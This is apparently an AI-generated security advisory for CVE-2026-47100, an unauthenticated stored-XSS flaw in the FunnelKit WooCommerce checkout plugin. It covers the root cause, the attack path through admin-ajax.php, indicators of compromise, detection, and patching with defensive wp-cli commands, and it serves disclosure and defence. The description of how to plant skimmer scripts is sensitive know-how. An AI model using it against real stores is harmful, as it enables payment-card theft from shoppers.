CVE-2026-47100 Overview
CVE-2026-47100 is a missing authorization vulnerability [CWE-862] in the Funnel Builder for WooCommerce Checkout plugin prior to version 3.15.0.3. The plugin's public checkout AJAX endpoint fails to validate caller permissions before invoking internal methods. Unauthenticated attackers can write arbitrary data to the plugin's External Scripts global setting. This setting is rendered into the storefront, so injected JavaScript executes in the browser of every checkout page visitor. The flaw enables stored cross-site scripting (XSS) against shoppers, including payment data skimming and session theft. Sansec has reported active exploitation campaigns targeting affected WooCommerce stores.
Critical Impact
Unauthenticated attackers can inject persistent JavaScript into the checkout page, exposing every shopper to credential theft, payment skimming, and account takeover.
Affected Products
- Funnel Builder for WooCommerce Checkout (FunnelKit) versions prior to 3.15.0.3
- WordPress sites running WooCommerce with the vulnerable plugin enabled
- All site visitors interacting with checkout pages on affected installations
Discovery Timeline
- 2026-05-19 - CVE-2026-47100 published to NVD
- 2026-05-19 - Last updated in NVD database
Technical Details for CVE-2026-47100
Vulnerability Analysis
The vulnerability resides in the plugin's AJAX controller, class-wfacp-ajax-controller.php, which is registered to handle requests from the public checkout flow. The controller exposes a dispatcher that routes incoming requests to internal methods based on attacker-controlled parameters. Because the dispatcher does not enforce a capability or nonce check, any unauthenticated visitor can invoke privileged internal methods intended only for administrators. One such method writes values directly into the plugin's External Scripts global option, which the front end renders verbatim into the <head> of checkout pages.
Attackers leverage this primitive to store arbitrary JavaScript that executes for every subsequent checkout visitor. Reported exploitation activity uses the injection to load remote skimmer scripts that exfiltrate billing details, credit card numbers, and authentication cookies. Because the payload lives in a global option, a single request persists across all checkout pages until an administrator manually purges the setting.
Root Cause
The root cause is missing authorization on a public-facing AJAX endpoint. The controller resolves method names from request parameters and dispatches to them without confirming that the caller holds the manage_options capability or any equivalent privilege. Settings writers and read-only helpers share the same entry point, collapsing the trust boundary between unauthenticated shoppers and store administrators.
Attack Vector
Exploitation requires only network access to the target site. An attacker issues a single crafted POST request to the WordPress admin-ajax.php endpoint, specifying the vulnerable action and supplying JavaScript as the value of the External Scripts setting. No authentication, user interaction, or prior reconnaissance beyond plugin fingerprinting is required. Subsequent visits to the checkout page execute the injected script in each victim's browser session. See the VulnCheck Advisory for WooCommerce and the Sansec Research on FunnelKit Exploit for technical reproduction details.
Detection Methods for CVE-2026-47100
Indicators of Compromise
- Unexpected <script> tags or remote script src attributes rendered in the <head> of WooCommerce checkout pages.
- Non-empty or unfamiliar values in the plugin's External Scripts setting under FunnelKit configuration.
- Outbound requests from shopper browsers to attacker-controlled domains hosting skimmer payloads, as documented by Sansec.
Detection Strategies
- Audit the wp_options table for the FunnelKit External Scripts option and compare against a known-good baseline.
- Review web server access logs for POST requests to admin-ajax.php referencing FunnelKit actions from unauthenticated sessions.
- Scan rendered checkout HTML for inline JavaScript or external script tags that did not originate from approved integrations.
Monitoring Recommendations
- Alert on modifications to WooCommerce plugin options, especially fields that accept raw HTML or script content.
- Monitor egress traffic from checkout pages for connections to newly registered or low-reputation domains.
- Track plugin version inventory across all WordPress sites to confirm 3.15.0.3 or later is deployed.
How to Mitigate CVE-2026-47100
Immediate Actions Required
- Update Funnel Builder for WooCommerce Checkout to version 3.15.0.3 or later on every affected site.
- Inspect the External Scripts setting and remove any value that was not placed there by an authorized administrator.
- Rotate WooCommerce admin credentials and customer session secrets if injection is confirmed.
- Notify customers and payment processors if cardholder data may have been exposed.
Patch Information
The vendor addressed the issue in Funnel Builder version 3.15.0.3 by adding authorization checks to the AJAX controller. The fix is documented in the WordPress Funnel Builder Change at the plugin trac repository.
Workarounds
- Disable the Funnel Builder for WooCommerce Checkout plugin until the patched version is applied.
- Deploy a web application firewall (WAF) rule that blocks unauthenticated POST requests to admin-ajax.php targeting FunnelKit actions.
- Apply a Content Security Policy (CSP) on checkout pages to restrict script sources to a vetted allowlist.
# Verify installed plugin version on a WordPress host
wp plugin get funnel-builder --field=version
# Inspect the External Scripts option for unexpected content
wp option get wfacp_external_scripts
# Force upgrade to the patched release
wp plugin update funnel-builder --version=3.15.0.3
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
